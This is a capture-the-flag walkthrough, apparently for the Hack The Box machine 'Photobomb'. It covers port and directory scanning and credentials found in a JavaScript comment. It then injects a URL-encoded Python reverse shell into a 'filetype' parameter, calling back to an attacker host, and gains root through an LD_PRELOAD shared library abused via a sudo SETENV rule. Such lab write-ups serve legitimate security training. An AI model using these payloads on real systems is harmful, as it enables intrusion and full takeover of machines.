Nmap scan with default script and version enumeration.
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-29 15:43 MST
Nmap scan report for 10.10.11.182
Host is up (0.068s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e22473bbfbdf5cb520b66876748ab58d (RSA)
| 256 04e3ac6e184e1b7effac4fe39dd21bae (ECDSA)
|_ 256 20e05d8cba71f08c3a1819f24011d29e (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.67 seconds
FeroxBuster to find more pages. only find /printer. This is also linked on main page.
βββ[Target:PhotobombπIP:10.10.11.182πβοΈAttacker:SourMilkπ‘IP:10.10.10.10πPrize:20 points]
ββββΌ[πΎ]~ $ feroxbuster --url http://photobomb.htb -w /usr/share/payloads/SecLists/Discovery/Web-Content/raft-medium-directories.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher π€ ver: 2.7.1
ββββββββββββββββββββββββββββ¬ββββββββββββββββββββββ
π― Target Url β http://photobomb.htb
π Threads β 50
π Wordlist β /usr/share/payloads/SecLists/Discovery/Web-Content/raft-medium-directories.txt
π Status Codes β [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
π₯ Timeout (secs) β 7
𦑠User-Agent β feroxbuster/2.7.1
π HTTP methods β [GET]
π Recursion Depth β 4
π New Version Available β https://github.com/epi052/feroxbuster/releases/latest
ββββββββββββββββββββββββββββ΄ββββββββββββββββββββββ
π Press [ENTER] to use the Scan Management Menuβ’
ββββββββββββββββββββββββββββββββββββββββββββββββββ
200 GET 22l 95w 843c http://photobomb.htb/
401 GET 7l 12w 188c http://photobomb.htb/printer
401 GET 7l 12w 188c http://photobomb.htb/printers
401 GET 7l 12w 188c http://photobomb.htb/printer_friendly
401 GET 7l 12w 188c http://photobomb.htb/printerfriendly
401 GET 7l 12w 188c http://photobomb.htb/printer-friendly
[####################] - 2m 60000/60000 0s found:6 errors:0
[####################] - 2m 30000/30000 248/s http://photobomb.htb
[####################] - 2m 30000/30000 248/s http://photobomb.htb/
Inspect photobomb.js on main page. Find Credentials. Use those to log into printer
function init() { // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) { document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0...:...Mb!@photobomb.htb/printer'); } } window.onload = init;
Capture download of file.
POST /printer HTTP/1.1 Host: photobomb.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 79 Origin: http://photobomb.htb Authorization: Basic cEgwdDA6YjBNYiE= Connection: close Referer: http://photobomb.htb/printer Upgrade-Insecure-Requests: 1 DNT: 1 Sec-GPC: 1 photo=almas-salakhov-VK7TCqcZTlw-unsplash.jpg&filetype=png&dimensions=3000x2000
We find filetype is injectable. Add python reverse shell and URL encode.
POST /printer HTTP/1.1 Host: photobomb.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 79 Origin: http://photobomb.htb Authorization: Basic cEgwdDA6YjBNYiE= Connection: close Referer: http://photobomb.htb/printer Upgrade-Insecure-Requests: 1 DNT: 1 Sec-GPC: 1 photo=almas-salakhov-VK7TCqcZTlw-unsplash.jpg&filetype=png;python3%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%2210.10.10.10%22%2C4444%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3Bos.dup2%28s.fileno%28%29%2C1%29%3Bos.dup2%28s.fileno%28%29%2C2%29%3Bp%3Dsubprocess.call%28%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D%29%3B%27&dimensions=3000x2000
Boom Shell
ββββΌ[πΎ]~ $ nc -nlvp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.11.182 47022
/bin/sh: 0: can't access tty; job control turned off
$ ls
log
photobomb.sh
public
resized_images
server.rb
syntaxhighlight_images
$ id
uid=1000(wizard) gid=1000(wizard) groups=1000(wizard)
Check sudo -l. cleanup.sh requires no password.
$ sudo -l
Matching Defaults entries for wizard on photobomb:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User wizard may run the following commands on photobomb:
(root) SETENV: NOPASSWD: /opt/cleanup.sh
Do some Reading about this Check secure_path and see /usr/bin instead of /bin/sh from article. Create sour.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/usr/bin/bash");
}
Compile
gcc -fPIC -shared -o sour.so sour.c -nostartfiles
Upload and execute
$ pwd
/tmp
$ sudo LD_PRELOAD=/tmp/sour.so /opt/cleanup.sh
id
uid=0(root) gid=0(root) groups=0(root)
Done!